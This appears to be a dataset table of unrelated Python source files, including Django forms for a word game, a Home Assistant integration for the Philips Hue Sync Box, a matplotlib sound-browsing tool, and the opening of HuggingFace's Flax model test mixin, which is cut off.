text
stringlengths 2
999k
|
|---|
from django import forms
from .models import GameState, RoundState, Game, Player, WordCard, Sentence, PlayerName
import re
class GameStateForm(forms.ModelForm):
class Meta:
model = GameState
fields = ['name']
exclude = []
widgets = None
localized_fields = None
labels = {}
help_texts = {}
error_messages = {}
def __init__(self, *args, **kwargs):
return super(GameStateForm, self).__init__(*args, **kwargs)
def is_valid(self):
return super(GameStateForm, self).is_valid()
def full_clean(self):
return super(GameStateForm, self).full_clean()
def clean_name(self):
name = self.cleaned_data.get("name", None)
return name
def clean(self):
return super(GameStateForm, self).clean()
def validate_unique(self):
return super(GameStateForm, self).validate_unique()
def save(self, commit=True):
return super(GameStateForm, self).save(commit)
class RoundStateForm(forms.ModelForm):
class Meta:
model = RoundState
fields = ['name']
exclude = []
widgets = None
localized_fields = None
labels = {}
help_texts = {}
error_messages = {}
def __init__(self, *args, **kwargs):
return super(RoundStateForm, self).__init__(*args, **kwargs)
def is_valid(self):
return super(RoundStateForm, self).is_valid()
def full_clean(self):
return super(RoundStateForm, self).full_clean()
def clean_name(self):
name = self.cleaned_data.get("name", None)
return name
def clean(self):
return super(RoundStateForm, self).clean()
def validate_unique(self):
return super(RoundStateForm, self).validate_unique()
def save(self, commit=True):
return super(RoundStateForm, self).save(commit)
class GameForm(forms.ModelForm):
class Meta:
model = Game
fields = ['game_code', 'name', 'players', 'maxPlayers', 'round', 'maxRounds', 'waitSeconds', 'gameState', 'roundState']
exclude = []
widgets = None
localized_fields = None
labels = {}
help_texts = {}
error_messages = {}
def __init__(self, *args, **kwargs):
return super(GameForm, self).__init__(*args, **kwargs)
def is_valid(self):
return super(GameForm, self).is_valid()
def full_clean(self):
return super(GameForm, self).full_clean()
def clean_game_code(self):
game_code = self.cleaned_data.get("game_code", None)
return game_code
def clean_name(self):
name = self.cleaned_data.get("name", None)
return name
def clean_players(self):
players = self.cleaned_data.get("players", None)
return players
def clean_maxPlayers(self):
maxPlayers = self.cleaned_data.get("maxPlayers", None)
return maxPlayers
def clean_round(self):
round = self.cleaned_data.get("round", None)
return round
def clean_maxRounds(self):
maxRounds = self.cleaned_data.get("maxRounds", None)
return maxRounds
def clean_waitSeconds(self):
waitSeconds = self.cleaned_data.get("waitSeconds", None)
return waitSeconds
def clean_gameState(self):
gameState = self.cleaned_data.get("gameState", None)
return gameState
def clean_roundState(self):
roundState = self.cleaned_data.get("roundState", None)
return roundState
def clean(self):
return super(GameForm, self).clean()
def validate_unique(self):
return super(GameForm, self).validate_unique()
def save(self, commit=True):
return super(GameForm, self).save(commit)
class PlayerForm(forms.ModelForm):
class Meta:
model = Player
fields = ['name', 'playerPosition', 'playing', 'points', 'game', 'playerState']
exclude = []
widgets = None
localized_fields = None
labels = {}
help_texts = {}
error_messages = {}
def __init__(self, *args, **kwargs):
return super(PlayerForm, self).__init__(*args, **kwargs)
def is_valid(self):
return super(PlayerForm, self).is_valid()
def full_clean(self):
return super(PlayerForm, self).full_clean()
def clean_name(self):
name = self.cleaned_data.get("name", None)
return name
def clean_playerPosition(self):
playerPosition = self.cleaned_data.get("playerPosition", None)
return playerPosition
def clean_playing(self):
playing = self.cleaned_data.get("playing", None)
return playing
def clean_points(self):
points = self.cleaned_data.get("points", None)
return points
def clean_game(self):
game = self.cleaned_data.get("game", None)
return game
def clean_playerState(self):
playerState = self.cleaned_data.get("playerState", None)
return playerState
def clean(self):
return super(PlayerForm, self).clean()
def validate_unique(self):
return super(PlayerForm, self).validate_unique()
def save(self, commit=True):
return super(PlayerForm, self).save(commit)
class WordCardForm(forms.ModelForm):
class Meta:
model = WordCard
fields = ['content', 'deckNumber', 'used', 'game', 'createdBy', 'onPlayerHand']
exclude = []
widgets = None
localized_fields = None
labels = {}
help_texts = {}
error_messages = {}
def __init__(self, *args, **kwargs):
return super(WordCardForm, self).__init__(*args, **kwargs)
def is_valid(self):
return super(WordCardForm, self).is_valid()
def full_clean(self):
return super(WordCardForm, self).full_clean()
def clean_content(self):
content = self.cleaned_data.get("content", None)
return content
def clean_deckNumber(self):
deckNumber = self.cleaned_data.get("deckNumber", None)
return deckNumber
def clean_used(self):
used = self.cleaned_data.get("used", None)
return used
def clean_game(self):
game = self.cleaned_data.get("game", None)
return game
def clean_createdBy(self):
createdBy = self.cleaned_data.get("createdBy", None)
return createdBy
def clean_onPlayerHand(self):
onPlayerHand = self.cleaned_data.get("onPlayerHand", None)
return onPlayerHand
def clean(self):
return super(WordCardForm, self).clean()
def validate_unique(self):
return super(WordCardForm, self).validate_unique()
def save(self, commit=True):
return super(WordCardForm, self).save(commit)
class SentenceForm(forms.ModelForm):
class Meta:
model = Sentence
fields = ['content', 'valid', 'reject', 'game', 'createdBy']
exclude = []
widgets = None
localized_fields = None
labels = {}
help_texts = {}
error_messages = {}
def __init__(self, *args, **kwargs):
return super(SentenceForm, self).__init__(*args, **kwargs)
def is_valid(self):
return super(SentenceForm, self).is_valid()
def full_clean(self):
return super(SentenceForm, self).full_clean()
def clean_content(self):
content = self.cleaned_data.get("content", None)
return content
def clean_valid(self):
valid = self.cleaned_data.get("valid", None)
return valid
def clean_reject(self):
reject = self.cleaned_data.get("reject", None)
return reject
def clean_game(self):
game = self.cleaned_data.get("game", None)
return game
def clean_createdBy(self):
createdBy = self.cleaned_data.get("createdBy", None)
return createdBy
def clean(self):
return super(SentenceForm, self).clean()
def validate_unique(self):
return super(SentenceForm, self).validate_unique()
def save(self, commit=True):
return super(SentenceForm, self).save(commit)
class UserNameForm(forms.ModelForm):
class Meta:
model = Player
fields = ['name',]
exclude = []
widgets = None
localized_fields = None
labels = {}
help_texts = {}
error_messages = {}
def __init__(self, *args, **kwargs):
self.game_inst = kwargs.pop('game_inst', None)
super(UserNameForm, self).__init__(*args, **kwargs)
def clean_name(self):
name = self.cleaned_data.get("name", None)
print(Player.objects.filter(game=self.game_inst, name=name).count())
if Player.objects.filter(game=self.game_inst, name=name).count() > 0:
raise forms.ValidationError(
'Name \'%(value)s\' is already in use by another player in this game. Please pick another name.',
code='already-used',
params={'value': name},
)
else:
return name
class AddWordCardsForm(forms.Form):
word_collection = forms.CharField(widget=forms.Textarea(attrs={'id': 'textArea', 'rows': 5, 'cols': 100}),help_text="Enter words that you want to use for the game")
def clean_word_collection(self):
return self.cleaned_data.get("word_collection", '')
class AddSentenceForm(forms.Form):
sentence_proposal = forms.CharField(required=False, widget=forms.Textarea(attrs={'rows': 2, 'cols': 100}),help_text="Enter the sentence that you want to commit")
def clean_sentence_proposal(self):
return self.cleaned_data.get("sentence_proposal", '')
|
# Copyright 2016-2018 Scality
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask_wtf import FlaskForm
from wtforms import IntegerField
from wtforms.validators import DataRequired, NumberRange
from bert_e.jobs.eval_pull_request import EvalPullRequestJob
from .base import APIEndpoint, APIForm
class PullRequestForm(FlaskForm):
pr_id = IntegerField(
'pr id', validators=[DataRequired(), NumberRange(min=1)])
class EvalPullRequest(APIEndpoint):
rule = '/pull-requests/<int:pr_id>'
method = 'POST'
admin = False
job = EvalPullRequestJob
@staticmethod
def validate_endpoint_data(pr_id, json):
if pr_id < 1:
raise ValueError()
class EvalPullRequestForm(APIForm):
doc = '/pull-requests/pr_id'
endpoint_cls = EvalPullRequest
form_cls = PullRequestForm
title = 'Evaluate a pull request'
help_text = '''
<p>Create a job that will evaluate a single pull request and attempt
at merging it.</p>
'''
form_inner_html = '''
<input id="pr_id" name="pr_id" placeholder="pull request id"
class="form-control" required>
<button type="submit" class="btn btn-outline-danger
btn-block">evaluate</button>
'''
|
##
# This program processes a file containing a count followed by data values.
# If the file doesn't exist or the format is incorrect, you can specify another file.
#
import re
def main() :
done = False
while not done :
try :
filename = input("Please enter the file name: ")
data = readFile(filename)
# As an example for processing the data, we compute the sum.
total = 0
for value in data :
total = total + value
print("The sum is", total)
done = True
if not filename.endswith(".txt"): ##### Checks to make sure the file is .txt
raise ValueError() ##### Throws an exception if the file is in a wrong format
except IOError : ##### Checks if a FileNotFoundError raises
print("Error: file not found.")
except ValueError :
print("Error: wrong file format.")
except RuntimeError as error :
print("Error:", str(error))
## Opens a file and reads a data set.
# @param filename the name of the file holding the data
# @return a list containing the data in the file
#
def readFile(filename) :
with open(filename, "r") as inFile:
return readData(inFile)
## Reads a data set.
# @param inFile the input file containing the data
# @return the data set in a list
#
def readData(inFile) :
data = []
for line in inFile:
value = re.sub(r'[^0-9]', '', str(line)) ##### Removes all non-numbers from the file
value = int(value) # May raise a ValueError exception.
data.append(value)
# Make sure there are no more values in the file.
line = inFile.readline()
if line != "" :
raise RuntimeError("End of file expected.")
return data
# Start the program.
main()
|
import random
from player import Player
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider, Button, RadioButtons
from matplotlib.animation import FuncAnimation
def dist(a, b):
values = []
for _a, _b in zip(a, b):
if _a is not None and _b is not None:
values.append(abs(_a-_b))
if len(values) > 0:
return sum(values)/len(values)
return 0
def set_list(lines, row):
return sorted(list(set(line[row] for line in lines)))
def choice(l, normalize=True):
def _choice(v):
try:
return l.index(v)/(len(l)-1 if normalize else 1)
except ValueError:
return -1
return _choice
class SoundScape(object):
def __init__(self, data):
self.data = data
self.pos = []
self.vectors = []
self.active = set()
self.closest = None
self.pickup_range = data.get("pickup_range", 0.2)
self.sliders = []
self.radios = []
self.fig = plt.figure(figsize=(10, 4))
with open(data["info_file"]) as f:
lines = [line.split(data["delimiter"]) for line in f.readlines()]
self.mappings = []
for i, dim in enumerate(data["dimensions"]):
t = dim["type"]
row = dim["row"]
self.pos.append(dim.get("default", 0))
if t == "radio":
c = dim.get("choices", set_list(lines, row))
print(c)
self.mappings.append(choice(c))
wpos = [len(self.radios)*.16, 0.5, 0.15, .5]
ax = plt.axes(wpos)
radio = RadioButtons(ax, c, active=0)
radio.on_clicked(self.update_function(i))
self.radios.append(radio)
elif t == "float":
self.mappings.append(float)
wpos = [.2, len(self.sliders)*.10, .5, .1]
ax = plt.axes(wpos)
slider = Slider(ax, dim["name"], 0, 1, valinit=0)
slider.on_changed(self.update_function(i))
self.sliders.append(slider)
elif t == "len":
self.mappings.append(len)
wpos = [.2, len(self.sliders)*.10, .5, .1]
ax = plt.axes(wpos)
slider = Slider(ax, dim, 0, 1, valinit=0)
slider.on_changed(self.update_function(i))
self.sliders.append(slider)
for line in lines:
dim_values = []
for i, dim in enumerate(data["dimensions"]):
dim_values.append(self.mappings[i](line[dim["row"]]))
self.vectors.append((
data["root_folder"] + line[data["path_row"]],
*dim_values
))
self.update_position()
def update_function(self, i):
def _update(v):
self.pos[i] = self.mappings[i](v)
self.update_position()
return _update
def update_position(self):
self.active = set()
closest = None
for path, *v in self.vectors:
d = dist(self.pos, v)
if d < self.pickup_range:
self.active.add((path, d, *v))
if closest is None or closest[1] > d:
closest = (path, d, *v)
self.closest = closest
def volume(self, d):
l = 1 - d*(1/self.pickup_range)
return l, l
def play(self):
player = Player()
pickup_range = self.data["pickup_range"]
delay = self.data.get("delay", 10)
def update(t):
if len(self.active) > 0:
path, d, *v = random.sample(self.active, 1)[0]
player.fire(path, volume=self.volume(d))
animation = FuncAnimation(self.fig, update, interval=delay)
plt.show()
|
"""Support of Philips Hue Play HDMI Sync Box as mediaplayer"""
import asyncio
from datetime import timedelta
import textwrap
import aiohuesyncbox
import async_timeout
from homeassistant.components.light import ATTR_BRIGHTNESS, ATTR_BRIGHTNESS_STEP
from homeassistant.components.media_player import MediaPlayerEntity
from homeassistant.components.media_player.const import (
MEDIA_TYPE_MUSIC,
SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE,
SUPPORT_PLAY,
SUPPORT_PREVIOUS_TRACK,
SUPPORT_SELECT_SOUND_MODE,
SUPPORT_SELECT_SOURCE,
SUPPORT_STOP,
SUPPORT_TURN_OFF,
SUPPORT_TURN_ON,
SUPPORT_VOLUME_SET,
)
from homeassistant.const import STATE_IDLE, STATE_OFF, STATE_PLAYING
from .const import (
ATTR_ENTERTAINMENT_AREA,
ATTR_INPUT,
ATTR_INPUT_NEXT,
ATTR_INPUT_PREV,
ATTR_INTENSITY,
ATTR_INTENSITY_NEXT,
ATTR_INTENSITY_PREV,
ATTR_MODE,
ATTR_MODE_NEXT,
ATTR_MODE_PREV,
ATTR_SYNC,
ATTR_SYNC_TOGGLE,
DOMAIN,
INTENSITIES,
LOGGER,
MODES,
)
from .helpers import log_config_entry, redacted
from .huesyncbox import (
PhilipsHuePlayHdmiSyncBox,
async_retry_if_someone_else_is_syncing,
)
SUPPORT_HUESYNCBOX = (
SUPPORT_TURN_ON
| SUPPORT_TURN_OFF
| SUPPORT_SELECT_SOURCE
| SUPPORT_PLAY
| SUPPORT_PAUSE
| SUPPORT_STOP
| SUPPORT_VOLUME_SET
| SUPPORT_SELECT_SOUND_MODE
| SUPPORT_PREVIOUS_TRACK
| SUPPORT_NEXT_TRACK
)
SCAN_INTERVAL = timedelta(seconds=2)
MAX_BRIGHTNESS = 200
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Setup from configuration.yaml, not supported, only through integration."""
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Setup from config_entry."""
LOGGER.debug(
"%s async_setup_entry\nconfig_entry:\n%s\nhass.data\n%s",
__name__,
textwrap.indent(log_config_entry(config_entry), " "),
[redacted(v) for v in hass.data[DOMAIN].keys()],
)
entity = HueSyncBoxMediaPlayerEntity(
hass.data[DOMAIN][config_entry.data["unique_id"]]
)
async_add_entities([entity], update_before_add=True)
async def async_unload_entry(hass, config_entry):
"""Unload entity"""
# Not sure what to do, entities seem to disappear by themselves
# No other de-initialization seems needed
class HueSyncBoxMediaPlayerEntity(MediaPlayerEntity):
"""Representation of a HueSyncBox as mediaplayer."""
def __init__(self, huesyncbox: PhilipsHuePlayHdmiSyncBox) -> None:
self._huesyncbox = huesyncbox
self._available = False
huesyncbox.entity = self
@property
def device_info(self):
"""Return the device info."""
# Only return the identifiers so the entry gets linked properly
# Managing deviceinfo is done elsewhere
return {
"identifiers": {(DOMAIN, self._huesyncbox.api.device.unique_id)},
}
async def async_update(self):
"""Update the entity"""
try:
with async_timeout.timeout(5):
# Since we need to update multiple endpoints just update all in one call
old_device = self._huesyncbox.api.device
await self._huesyncbox.api.update()
if old_device != self._huesyncbox.api.device:
await self._huesyncbox.async_update_registered_device_info()
self._available = True
except (asyncio.TimeoutError, aiohuesyncbox.AiohuesyncboxException):
self._available = False
@property
def unique_id(self):
"""Return the uniqueid of the entity."""
return self._huesyncbox.api.device.unique_id
@property
def available(self):
"""Return if the device is available or not."""
return self._available
@property
def name(self):
"""Return the name of the entity."""
return self._huesyncbox.api.device.name
@property
def supported_features(self):
"""Flag of media commands that are supported."""
supported_commands = SUPPORT_HUESYNCBOX
return supported_commands
@property
def state(self):
"""Return the state of the entity."""
state = STATE_PLAYING
device_state = self._huesyncbox.api.execution.mode
if device_state == "powersave":
state = STATE_OFF
if device_state == "passthrough":
state = STATE_IDLE
return state
async def async_turn_off(self):
"""Turn off media player."""
await self._huesyncbox.api.execution.set_state(mode="powersave")
async def async_turn_on(self):
"""Turn the media player on."""
await self._huesyncbox.api.execution.set_state(mode="passthrough")
async def async_media_play(self):
"""Send play command."""
await async_retry_if_someone_else_is_syncing(
self._huesyncbox,
lambda: self._huesyncbox.api.execution.set_state(sync_active=True),
)
async def async_media_pause(self):
"""Send pause command."""
# Syncbox does not really have "pause", but the default mediaplayer
# card does not work when the mediaplayer only supports Stop,
# so lets implement pause for now to work around that
await self.async_media_stop()
async def async_media_stop(self):
"""Send stop command."""
await self._huesyncbox.api.execution.set_state(sync_active=False)
@property
def source(self):
"""Return the current input source."""
selected_source = self._huesyncbox.api.execution.hdmi_source
for input_ in self._huesyncbox.api.hdmi.inputs:
if input_.id == selected_source:
return input_.name
@property
def source_list(self):
"""List of available input sources."""
sources = []
for input_ in self._huesyncbox.api.hdmi.inputs:
sources.append(input_.name)
return sorted(sources)
async def async_select_source(self, source):
"""Select input source."""
# Source is the user given name, so needs to be mapped back to a valid API value."""
for input_ in self._huesyncbox.api.hdmi.inputs:
if input_.name == source:
await self._huesyncbox.api.execution.set_state(hdmi_source=input_.id)
break
@staticmethod
def get_hue_target_from_id(id_: str):
"""Determine API target from id"""
try:
return f"groups/{int(id_)}"
except ValueError:
return id_
async def async_select_entertainment_area(self, area_name):
"""Select entertainmentarea."""
# Area is the user given name, so needs to be mapped back to a valid API value."""
group = self._get_group_from_area_name(area_name)
if group:
await self._huesyncbox.api.execution.set_state(
hue_target=self.get_hue_target_from_id(group.id)
)
def _get_group_from_area_name(self, area_name):
"""Get the group object by entertainment area name."""
for group in self._huesyncbox.api.hue.groups:
if group.name == area_name:
return group
return None
def _get_entertainment_areas(self):
"""List of available entertainment areas."""
areas = []
for group in self._huesyncbox.api.hue.groups:
areas.append(group.name)
return sorted(areas)
def _get_selected_entertainment_area(self):
"""Return the name of the active entertainment area."""
hue_target = (
self._huesyncbox.api.execution.hue_target
) # note that this is a string like "groups/123"
selected_area = None
try:
id_ = hue_target.replace("groups/", "")
for group in self._huesyncbox.api.hue.groups:
if group.id == id_:
selected_area = group.name
break
except KeyError:
LOGGER.warning("Selected entertainment area not available in groups")
return selected_area
@property
def extra_state_attributes(self):
api = self._huesyncbox.api
mode = api.execution.mode
attributes = {
"mode": mode,
"entertainment_area_list": self._get_entertainment_areas(),
"entertainment_area": self._get_selected_entertainment_area(),
"bridge_unique_id": api.hue.bridge_unique_id,
"bridge_connection_state": api.hue.connection_state,
}
for index, input_ in enumerate(api.hdmi.inputs):
attributes[f"hdmi{index+1}_status"] = input_.status
if mode != "powersave":
attributes["brightness"] = self.scale(
api.execution.brightness, [0, MAX_BRIGHTNESS], [0, 1]
)
if not mode in MODES:
mode = api.execution.last_sync_mode
attributes["intensity"] = getattr(api.execution, mode).intensity
return attributes
async def async_set_sync_state(self, sync_state):
"""Set sync state."""
# Special handling for Toggle specific mode as that cannot be done in 1 call on the API
sync_toggle = sync_state.get(ATTR_SYNC_TOGGLE, None)
mode = sync_state.get(ATTR_MODE, None)
if sync_toggle and mode:
if self._huesyncbox.api.execution.mode != mode:
# When not syncing in the desired mode, just turn on the desired mode, no toggle
sync_toggle = None
else:
# Otherwise just toggle, no mode (setting mode would interfere with the toggle)
mode = None
# Entertainment area
group = self._get_group_from_area_name(
sync_state.get(ATTR_ENTERTAINMENT_AREA, None)
)
hue_target = self.get_hue_target_from_id(group.id) if group else None
state = {
"sync_active": sync_state.get(ATTR_SYNC, None),
"sync_toggle": sync_toggle,
# "hdmi_active": ,
# "hdmi_active_toggle": None,
"mode": mode,
"mode_cycle": "next"
if ATTR_MODE_NEXT in sync_state
else "previous"
if ATTR_MODE_PREV in sync_state
else None,
"hdmi_source": sync_state.get(ATTR_INPUT, None),
"hdmi_source_cycle": "next"
if ATTR_INPUT_NEXT in sync_state
else "previous"
if ATTR_INPUT_PREV in sync_state
else None,
"brightness": int(
self.scale(sync_state[ATTR_BRIGHTNESS], [0, 1], [0, MAX_BRIGHTNESS])
)
if ATTR_BRIGHTNESS in sync_state
else None,
"brightness_step": int(
self.scale(
sync_state[ATTR_BRIGHTNESS_STEP],
[-1, 1],
[-MAX_BRIGHTNESS, MAX_BRIGHTNESS],
)
)
if ATTR_BRIGHTNESS_STEP in sync_state
else None,
"intensity": sync_state.get(ATTR_INTENSITY, None),
"intensity_cycle": "next"
if ATTR_INTENSITY_NEXT in sync_state
else "previous"
if ATTR_INTENSITY_PREV in sync_state
else None,
"hue_target": hue_target,
}
try:
await async_retry_if_someone_else_is_syncing(
self._huesyncbox,
lambda: self._huesyncbox.api.execution.set_state(**state),
)
except aiohuesyncbox.RequestError as ex:
if "13: Invalid Key" in ex.args[0]:
# Clarify this specific case as people will run into it
# Use a warning so it is visually separated from the actual error
LOGGER.warning(
"This error most likely occured because the service call resulted in an empty message to the syncbox. Make sure that the selected options would result in an action on the syncbox (e.g. requesting only `sync_toggle:false` would cause such an error)."
)
raise
async def async_set_sync_mode(self, sync_mode):
"""Select sync mode."""
await async_retry_if_someone_else_is_syncing(
self._huesyncbox,
lambda: self._huesyncbox.api.execution.set_state(mode=sync_mode),
)
async def async_set_intensity(self, intensity, mode):
"""Set intensity for sync mode."""
if mode is None:
mode = self.get_mode()
# Intensity is per mode so update accordingly
state = {mode: {"intensity": intensity}}
await self._huesyncbox.api.execution.set_state(**state)
async def async_set_brightness(self, brightness):
"""Set brightness"""
api_brightness = self.scale(brightness, [0, 1], [0, MAX_BRIGHTNESS])
await self._huesyncbox.api.execution.set_state(brightness=api_brightness)
async def async_set_bridge(self, bridge_id, username, clientkey):
"""
Set bridge, note that this change is not instant.
After calling you will have to wait until the `bridge_unique_id` matches the new bridge id
and the bridge_connection_state is `connected`, `invalidgroup` or `streaming`, other status means it is connecting.
I have seen the bridge change to take around 15 seconds.
"""
await self._huesyncbox.api.hue.set_bridge(bridge_id, username, clientkey)
def get_mode(self):
"""Get mode"""
mode = self._huesyncbox.api.execution.mode
if not self._huesyncbox.api.execution.mode in MODES:
mode = self._huesyncbox.api.execution.last_sync_mode
return mode
@staticmethod
def scale(input_value, input_range, output_range):
"""Scale value from one range to another"""
input_min = input_range[0]
input_max = input_range[1]
input_spread = input_max - input_min
output_min = output_range[0]
output_max = output_range[1]
output_spread = output_max - output_min
value_scaled = float(input_value - input_min) / float(input_spread)
return output_min + (value_scaled * output_spread)
# Below properties and methods are temporary to get a "free" UI with the mediaplayer card
@property
def volume_level(self):
"""Volume level of the media player (0..1) is mapped brightness for free UI."""
return self.scale(
self._huesyncbox.api.execution.brightness, [0, MAX_BRIGHTNESS], [0, 1]
)
async def async_set_volume_level(self, volume):
"""Set volume level of the media player (0..1), abuse to control brightness for free UI."""
await self.async_set_brightness(volume)
@property
def sound_mode(self):
"""Return the current sound mode (actually intensity)."""
attributes = self.extra_state_attributes
if "intensity" in attributes:
return attributes["intensity"]
return None
@property
def sound_mode_list(self):
"""List of available soundmodes / intensities."""
return INTENSITIES
async def async_select_sound_mode(self, sound_mode):
"""Select sound mode, abuse for intensity to get free UI."""
await self.async_set_intensity(sound_mode, None)
@property
def media_content_type(self):
"""Content type of current playing media."""
# Pretend we are playing music to expose additional data (e.g. mode and intensity) to the player
return MEDIA_TYPE_MUSIC
@property
def media_title(self):
"""Title of current playing media, abuse to disaplay mode + intensity for free UI."""
return f"{self.get_mode().capitalize()} - {self.sound_mode.capitalize()}"
@property
def media_artist(self):
"""Title of current playing media, abuse to display current source so I have a free UI."""
return self.source
async def async_media_previous_track(self):
"""Send previous track command, abuse to cycle modes for now."""
await self._huesyncbox.api.execution.cycle_sync_mode(False)
async def async_media_next_track(self):
"""Send next track command, abuse to cycle modes for now."""
await self._huesyncbox.api.execution.cycle_sync_mode(True)
|
from model.creator.creator import Creator
from datetime import date
class DocumentoController:
def __init__(self):
pass
@staticmethod
def getDocumento(nome, caminho, tipo, data):
try:
arquivo = open(caminho, "r")
except FileNotFoundError:
raise FileNotFoundError('Arquivo não encontrado')
try:
dia, mes, ano = map(int, data.split('/'))
data = date(ano, mes, dia)
except ValueError:
raise ValueError("Formato da data inválido")
if data > date.today():
raise ValueError("Data inválida")
return Creator().newDocumento(nome, caminho, tipo, data)
@staticmethod
def readDocumento(nome=None, caminho=None, tipo=None, data=None):
return Creator().newDocumento(nome, caminho, tipo, data)
|
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import inspect
import random
import tempfile
import unittest
from typing import List, Tuple
import numpy as np
import transformers
from huggingface_hub import HfApi
from requests.exceptions import HTTPError
from transformers import BertConfig, is_flax_available, is_torch_available
from transformers.models.auto import get_values
from transformers.testing_utils import (
ENDPOINT_STAGING,
PASS,
USER,
CaptureLogger,
is_pt_flax_cross_test,
is_staging_test,
require_flax,
slow,
)
from transformers.utils import logging
if is_flax_available():
import os
import jax
import jax.numpy as jnp
from flax.core.frozen_dict import unfreeze
from flax.traverse_util import flatten_dict
from transformers import (
FLAX_MODEL_FOR_QUESTION_ANSWERING_MAPPING,
FLAX_MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING,
FLAX_MODEL_MAPPING,
FlaxAutoModelForSequenceClassification,
FlaxBertModel,
)
from transformers.modeling_flax_pytorch_utils import (
convert_pytorch_state_dict_to_flax,
load_flax_weights_in_pytorch_model,
)
os.environ["XLA_PYTHON_CLIENT_MEM_FRACTION"] = "0.12" # assumed parallelism: 8
if is_torch_available():
import torch
def _config_zero_init(config):
configs_no_init = copy.deepcopy(config)
for key in configs_no_init.__dict__.keys():
if "_range" in key or "_std" in key or "initializer_factor" in key:
setattr(configs_no_init, key, 1e-10)
return configs_no_init
def ids_tensor(shape, vocab_size, rng=None):
"""Creates a random int32 tensor of the shape within the vocab size."""
if rng is None:
rng = random.Random()
total_dims = 1
for dim in shape:
total_dims *= dim
values = []
for _ in range(total_dims):
values.append(rng.randint(0, vocab_size - 1))
output = np.array(values, dtype=jnp.int32).reshape(shape)
return output
def floats_tensor(shape, scale=1.0, rng=None, name=None):
"""Creates a random float32 tensor"""
if rng is None:
rng = random.Random()
total_dims = 1
for dim in shape:
total_dims *= dim
values = []
for _ in range(total_dims):
values.append(rng.random() * scale)
return np.array(values, dtype=jnp.float32).reshape(shape)
def random_attention_mask(shape, rng=None):
attn_mask = ids_tensor(shape, vocab_size=2, rng=rng)
# make sure that at least one token is attended to for each batch
attn_mask[:, -1] = 1
return attn_mask
@require_flax
class FlaxModelTesterMixin:
model_tester = None
all_model_classes = ()
is_encoder_decoder = False
def _prepare_for_class(self, inputs_dict, model_class):
inputs_dict = copy.deepcopy(inputs_dict)
# hack for now until we have AutoModel classes
if "ForMultipleChoice" in model_class.__name__:
inputs_dict = {
k: jnp.broadcast_to(v[:, None], (v.shape[0], self.model_tester.num_choices, v.shape[-1]))
if isinstance(v, (jnp.ndarray, np.ndarray))
else v
for k, v in inputs_dict.items()
}
return inputs_dict
def assert_almost_equals(self, a: np.ndarray, b: np.ndarray, tol: float):
diff = np.abs((a - b)).max()
self.assertLessEqual(diff, tol, f"Difference between torch and flax is {diff} (>= {tol}).")
def test_model_outputs_equivalence(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
def set_nan_tensor_to_zero(t):
t[t != t] = 0
return t
def check_equivalence(model, tuple_inputs, dict_inputs, additional_kwargs={}):
tuple_output = model(**tuple_inputs, return_dict=False, **additional_kwargs)
dict_output = model(**dict_inputs, return_dict=True, **additional_kwargs).to_tuple()
def recursive_check(tuple_object, dict_object):
if isinstance(tuple_object, (List, Tuple)):
for tuple_iterable_value, dict_iterable_value in zip(tuple_object, dict_object):
recursive_check(tuple_iterable_value, dict_iterable_value)
elif tuple_object is None:
return
else:
self.assert_almost_equals(
set_nan_tensor_to_zero(tuple_object), set_nan_tensor_to_zero(dict_object), 1e-5
)
recursive_check(tuple_output, dict_output)
for model_class in self.all_model_classes:
model = model_class(config)
tuple_inputs = self._prepare_for_class(inputs_dict, model_class)
dict_inputs = self._prepare_for_class(inputs_dict, model_class)
check_equivalence(model, tuple_inputs, dict_inputs)
tuple_inputs = self._prepare_for_class(inputs_dict, model_class)
dict_inputs = self._prepare_for_class(inputs_dict, model_class)
check_equivalence(model, tuple_inputs, dict_inputs, {"output_hidden_states": True})
@is_pt_flax_cross_test
def test_equivalence_pt_to_flax(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
with self.subTest(model_class.__name__):
# prepare inputs
prepared_inputs_dict = self._prepare_for_class(inputs_dict, model_class)
pt_inputs = {k: torch.tensor(v.tolist()) for k, v in prepared_inputs_dict.items()}
# load corresponding PyTorch class
pt_model_class_name = model_class.__name__[4:] # Skip the "Flax" at the beginning
pt_model_class = getattr(transformers, pt_model_class_name)
pt_model = pt_model_class(config).eval()
# Flax models don't use the `use_cache` option and cache is not returned as a default.
# So we disable `use_cache` here for PyTorch model.
pt_model.config.use_cache = False
fx_model = model_class(config, dtype=jnp.float32)
fx_state = convert_pytorch_state_dict_to_flax(pt_model.state_dict(), fx_model)
fx_model.params = fx_state
with torch.no_grad():
pt_outputs = pt_model(**pt_inputs).to_tuple()
fx_outputs = fx_model(**prepared_inputs_dict).to_tuple()
self.assertEqual(len(fx_outputs), len(pt_outputs), "Output lengths differ between Flax and PyTorch")
for fx_output, pt_output in zip(fx_outputs, pt_outputs):
self.assert_almost_equals(fx_output, pt_output.numpy(), 4e-2)
with tempfile.TemporaryDirectory() as tmpdirname:
pt_model.save_pretrained(tmpdirname)
fx_model_loaded = model_class.from_pretrained(tmpdirname, from_pt=True)
fx_outputs_loaded = fx_model_loaded(**prepared_inputs_dict).to_tuple()
self.assertEqual(
len(fx_outputs_loaded), len(pt_outputs), "Output lengths differ between Flax and PyTorch"
)
for fx_output_loaded, pt_output in zip(fx_outputs_loaded, pt_outputs):
self.assert_almost_equals(fx_output_loaded, pt_output.numpy(), 4e-2)
@is_pt_flax_cross_test
def test_equivalence_flax_to_pt(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
